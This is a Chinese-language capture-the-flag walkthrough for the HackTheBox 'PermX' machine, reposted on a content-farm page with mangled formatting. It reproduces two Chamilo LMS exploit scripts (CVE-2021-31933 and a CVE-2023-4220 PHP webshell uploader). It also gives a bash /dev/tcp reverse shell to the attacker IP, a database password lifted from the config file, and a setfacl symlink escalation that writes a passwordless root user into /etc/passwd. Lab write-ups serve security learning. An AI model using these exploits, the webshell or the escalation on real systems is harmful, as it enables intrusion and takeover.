当前位置： 首页 > news >正文

服务器网站网站专用,无锡做装修网站,企业开发流程,网站维护中目录 连接至HTB服务器并启动靶机 1.How many TCP ports are listening on PermX? 使用nmap对靶机TCP端口进行开放扫描 2.What is the default domain name used by the web server on the box? 使用curl访问靶机80端口 3.On what subdomain of permx.htb is there an o…目录 连接至HTB服务器并启动靶机 1.How many TCP ports are listening on PermX? 使用nmap对靶机TCP端口进行开放扫描 2.What is the default domain name used by the web server on the box? 使用curl访问靶机80端口 3.On what subdomain of permx.htb is there an online learning platform? 使用ffuf对该域名进行子域名FUZZ 使用浏览器直接访问该子域 4.What is the name of the application running on lms.permx.htb? 使用Wappalyzer查看该网站技术栈 5.What version of Chamilo is running on PermX? 使用ffuf对子域进行路径FUZZ 使用浏览器访问子域下robots.txt文件 6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution? 启动Metasploit 进入CVE.MITRE.ORG网站搜索该CMS相关漏洞 7.What user is the webserver running as on PermX? 8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo? 本地侧使用nc开始监听 9.Submit the flag located in the mtz users home directory. USER_FLAG7239022c6248c28ed2945734c9e07ac9 10.What is the full path to the script that the mtz user can run as any user without a password? 11./opt/acl.sh allow for changing the access control list on file in what directory? (Dont include the trailing / on the directory.) 12.Does setfacl follow symbolic links by default?(YES) 13.Submit the flag located in the root users home directory. ROOT_FLAG86f2867102ba7ec4855205a4f2096539 连接至HTB服务器并启动靶机 靶机IP10.10.11.23 分配IP10.10.14.12 1.How many TCP ports are listening on PermX? 使用nmap对靶机TCP端口进行开放扫描 nmap -p- –min-rate1500 -T5 -sS -Pn 10.10.11.23 由扫描结果可见靶机开放端口22、80共2个端口 2.What is the default domain name used by the web server on the box? 使用curl访问靶机80端口 curl -I 10.10.11.23:80 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl -I 10.10.11.23:80 HTTP/1.1 302 Found Date: Mon, 04 Nov 2024 00:32:59 GMT Server: Apache/2.4.52 (Ubuntu) Location: http://permx.htb Content-Type: text/html; charsetiso-8859-1 由输出可见直接访问靶机IP将被重定位至permx.htb 3.On what subdomain of permx.htb is there an online learning platform? 将靶机IP与域名进行绑定 echo 10.10.11.23 permx.htb /etc/hosts 使用ffuf对该域名进行子域名FUZZ ffuf -u http://permx.htb -H Host: FUZZ.permx.htb -w ../dictionary/subdomains-top1mil-5000.txt -fc 302 再次将靶机IP与该子域进行绑定 echo 10.10.11.23 lms.permx.htb /etc/hosts 使用浏览器直接访问该子域 搜索Chamilo可见该子域lms.permx.htb托管一个在线学习平台 4.What is the name of the application running on lms.permx.htb? 使用Wappalyzer查看该网站技术栈 可见该页面所用WebAPP为Chamilo(CMS) 5.What version of Chamilo is running on PermX? 使用ffuf对子域进行路径FUZZ ffuf -u http://lms.permx.htb/FUZZ -w ../dictionary/common.txt 使用浏览器访问子域下robots.txt文件 进入documentation目录下 由该页面标题可见该CMS版本为1.11 6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution? 对该CMS进行漏洞搜索 searchsploit Chamilo 将RCE相关的EXP拷贝到当前目录下 searchsploit -m 49867.py 查看该EXP代码 cat 49867.py

Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)

Date: 13/05/2021

Exploit Author: M. Cory Billington (_th3y)

Vendor Homepage: https://chamilo.org

Software Link: https://github.com/chamilo/chamilo-lms

Version: 1.11.14

Tested on: Ubuntu 20.04.2 LTS

CVE: CVE-2021-31933

Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/from requests import Session

from random import choice from string import ascii_lowercaseimport requests# This is all configuration stuff, url http://127.0.0.1/chamilo-lms/ # URL to remote host web root user_name admin # User must be an administrator password admin command id;whoami# Where you want to upload your webshell. Must be writable by web server user.

This spot isnt protectec by .htaccess

webshell_path web/ webshell_name fshell-{.join(choice(ascii_lowercase) for _ in range(6))}.phar # Just a random name for webshell file content f?php echo {command}; ?def main():# Run a context manager with a session object to hold login session after loginwith Session() as s:login_url f{url}index.phplogin_data {login: user_name,password: password}r s.post(login_url, datalogin_data) # login request# Check to see if login as admin user was successful.if admin not in r.url:print(f[-] Login as {user_name} failed. Need to be admin)returnprint(f[] Logged in as {user_name})print(f[] Cookie: {s.cookies})file_upload_url f{url}main/upload/upload.php# The curdirpath is not santitized, so I traverse to the /var/www/html/chamilo-lms/web/build directory. I can upload to /tmp/ as wellphp_webshell_file {curdirpath: (None, f/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}),user_upload: (webshell_name, content)}## Good command if you want to see what the request looks like without sending# print(requests.Request(POST, file_upload_url, filesphp_webshell_file).prepare().body.decode(ascii))# Two requests required to actually upload the filefor i in range(2):s.post(file_upload_url, filesphp_webshell_file)exploit_request_url f{url}{webshell_path}{webshell_name}print([] Upload complete!)print(f[] Webshell: {exploit_request_url})# This is a GET request to the new webshell to trigger code executioncommand_output s.get(exploit_request_url)print([] Command output:\n)print(command_output.text)if name main:main() 由该EXP注释可知该EXP基于漏洞CVE-2021-31933。好像并不是我们要找的2023漏洞 启动Metasploit msfconsole 搜索Chamilo相关模块 search Chamilo 可见该漏洞模块无需认证可直接代码注入导致RCE切换至该模块 use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960 查看该模块信息 info 从模块描述可见该模块基于漏洞CVE-2023-34960 往上一填发现答案居然不对才发现是要找存储型XSS漏洞 进入CVE.MITRE.ORG网站搜索该CMS相关漏洞 对stored cross-site进行搜索 该漏洞允许无认证文件执行JS脚本与上传WebshellCVE-2023-4220 7.What user is the webserver running as on PermX? 我这边直接到Github上寻找该漏洞相关EXP #!/usr/bin/env python3

-- coding: UTF-8 --# Name : CVE-2023-4220

Autor : Insomnia (Jacob S.)

IG : insomnia.py

X : insomniadev_

Yt : insomnia-dev

Github : https://github.com/insomnia-jacob

Description: Automation of RCE in Chamilo LMS on affected versions of CVE-2023-4220 through a web shellimport argparse

import requests import time from os import system import io# Colors red \033[31m green \033[32m blue \033[34m yellow \033[93m reset \033[0mdef arguments():global argsparser argparse.ArgumentParser()parser.add_argument( -t, –target, requiredTrue ,helpEnter the target domain, for example: http://example.com )args parser.parse_args()def check_url_exists(url):print(blue,\n\n[], reset, Checking if it is vulnerable.)try:response requests.head(url /main/inc/lib/javascript/bigupload/files, allow_redirectsTrue)if response.status_code 200:is_vuln()try:response2 requests.head(url /main/inc/lib/javascript/bigupload/files/insomnia.php, allow_redirectsTrue)if response2.status_code 200:print(fSuccess! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php)else:upload_file(args.target)except requests.RequestException as e:print(red,f[x] Error checking the URL: {e})return Falseelse:print(fError {url})except requests.RequestException as e:print(red,f[x] Error checking the URL: {e})return Falsedef upload_file(url):new_url url /main/inc/lib/javascript/bigupload/inc/bigUpload.php?actionpost-unsupportedinsomnia_php
html body form methodGET name?php echo basename(\(_SERVER[PHP_SELF]); ? input typeTEXT namecmd autofocus idcmd size80 input typeSUBMIT valueExecute /form pre ?phpif(isset(\)_GET[cmd])){system(\(_GET[cmd] . 21);} ? /pre /body /html file_like_object io.BytesIO(insomnia_php.encode(utf-8))file_like_object.name insomnia.php files {bigUploadFile: file_like_object}response3 requests.post(new_url, filesfiles)print(response3.status_code)print(fSuccess! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php)def is_vuln():print(red, ███████████████████████████ ███████▀▀▀░░░░░░░▀▀▀███████ ████▀░░░░░░░░░░░░░░░░░▀████ ███│░░░░░░░░░░░░░░░░░░░│███ ██▌│░░░░░░░░░░░░░░░░░░░│▐██ ██░└┐░░░░░░░░░░░░░░░░░┌┘░██ ██░░└┐░░░░░░░░░░░░░░░┌┘░░██ [*] It is vulnerable! ██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██ ██▌░│██████▌░░░▐██████│░▐██ [*] It is vulnerable! ███░│▐███▀▀░░▄░░▀▀███▌│░███ ██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██ [*] It is vulnerable! ██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██ ████▄─┘██▌░░░░░░░▐██└─▄████ [*] It is vulnerable! █████░░▐█─┬┬┬┬┬┬┬─█▌░░█████ ████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████ █████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████ ███████▄░░░░░░░░░░░▄███████ ██████████▄▄▄▄▄▄▄██████████ ███████████████████████████ , reset) def target(url):print(blue ,f URL: {url})time.sleep(3)system(clear) def banner():textBanner rf/ __)/ )( \( __)___(___ \ / \(___ \( __ \ ___ / _ \(___ \(___ \ / \ ( (__ \ \/ / ) _)(___)/ __/( 0 )/ __/ (__ ((___)(__ ( / __/ / __/( 0 )\___) \__/ (____) (____) \__/(____)(____/ (__/(____)(____) \__/ print(green,textBanner)print(yellow, by Insomnia (Jacob S.))def main():arguments()banner()target(args.target)check_url_exists(args.target)if __name__ __main__:main() 直接使用该EXP开始漏洞利用 python exploit.py -t http://lms.permx.htb/ 直接访问EXP提供的URL执行whoami命令 由回显可见当前用户为www-data 8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo? 本地侧使用nc开始监听 nc -lvnp 1425 通过EXP提供的Webshell反弹shell bash -c bash -i /dev/tcp/10.10.14.12/1425 01 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nc -lvnp 1425 listening on [any] 1425 ... connect to [10.10.14.12] from (UNKNOWN) [10.10.11.23] 53550 bash: cannot set terminal process group (1173): Inappropriate ioctl for device bash: no job control in this shell www-datapermx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files\) whoami ilo/main/inc/lib/javascript/bigupload/files\( whoami                      www-data 提升TTY script -c /bin/bash -q /dev/null 搜索WebAPP下所有可能的配置相关文件并输出为列表 find /var/www/chamilo -name conf* -type f 2/dev/null | tee res.txt 逐个查看文件内容并匹配password字段 cat res.txt | xargs -I {} sh -c cat {} | grep password 查询该字段出处03F6lY3uXAP2bkW8 xargs -I {} sh -c grep -m1 03F6lY3uXAP2bkW8 {} echo Found in {} res.txt www-datapermx:/var/www/chamilo\) xargs -I {} sh -c grep -m1 03F6lY3uXAP2bkW8 {} echo Found in {} res.txt lY3uXAP2bkW8 {} echo Found in {} res.txt \(_configuration[db_password] 03F6lY3uXAP2bkW8; Found in /var/www/chamilo/app/config/configuration.php 从该文件中找出匹配字符串并输出上下5行 grep -C 5 03F6lY3uXAP2bkW8 /var/www/chamilo/app/config/configuration.php www-datapermx:/var/www/chamilo\) grep -C 5 03F6lY3uXAP2bkW8 /var/www/chamilo/app/config/configuration.php bkW8 /var/www/chamilo/app/config/configuration.php // Database connection settings. \(_configuration[db_host] localhost; \)_configuration[db_port] 3306; \(_configuration[main_database] chamilo; \)_configuration[db_user] chamilo; \(_configuration[db_password] 03F6lY3uXAP2bkW8; // Enable access to database management for platform admins. \)_configuration[db_manager_enabled] false; /**  * Directory settings. 账户chamilo 密码03F6lY3uXAP2bkW8 总结一下该文件存储着数据库连接信息/var/www/chamilo/app/config/configuration.php 9.Submit the flag located in the mtz users home directory. 查看靶机支持登录的用户 cat /etc/passwd 尝试使用该用户对靶机进行SSH服务登录 ssh mtz10.10.11.23 查询user_flag位置并查看其内容 mtzpermx:$ find / -name user.txt 2/dev/null /home/mtz/user.txt mtzpermx:\( cat /home/mtz/user.txt 7239022c6248c28ed2945734c9e07ac9 USER_FLAG7239022c6248c28ed2945734c9e07ac9 10.What is the full path to the script that the mtz user can run as any user without a password? 查看该用户可无密码特权运行的命令 sudo -l mtzpermx:~\) sudo -l Matching Defaults entries for mtz on permx:     env_reset, mail_badpass, secure_path/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty User mtz may run the following commands on permx:     (ALL : ALL) NOPASSWD: /opt/acl.sh 存在文件可无密码特权运行/opt/acl.sh 11./opt/acl.sh allow for changing the access control list on file in what directory? (Dont include the trailing / on the directory.) 通过脚本内容可知该脚本运行后允许在/home/mtz目录下赋任意链接任意权限 12.Does setfacl follow symbolic links by default?(YES) 13.Submit the flag located in the root users home directory. 尝试创建连接test连接至/etc/passwd ln -s /etc/passwd /home/mtz/test 通过/opt/acl.sh脚本为/home/mtz/test链接赋读写权限 sudo /opt/acl.sh mtz rw /home/mtz/test mtzpermx:$ ln -s /etc/passwd /home/mtz/test mtzpermx:\( ls priv  test  user.txt mtzpermx:~\) sudo /opt/acl.sh mtz rw /home/mtz/test 往/home/mtz/test链接中写入新用户 echo 0dayhp::0:0:0dayhp:/root:/bin/bash /home/mtz/test 切换到0dayhp用户bash su 0dayhp 查找root_flag位置并查看其内容 rootpermx:/home/mtz# find / -name root.txt /root/root.txt /var/www/chamilo/vendor/symfony/intl/Tests/Data/Bundle/Reader/Fixtures/txt/root.txt rootpermx:/home/mtz# cat /root/root.txt 86f2867102ba7ec4855205a4f2096539 ROOT_FLAG86f2867102ba7ec4855205a4f2096539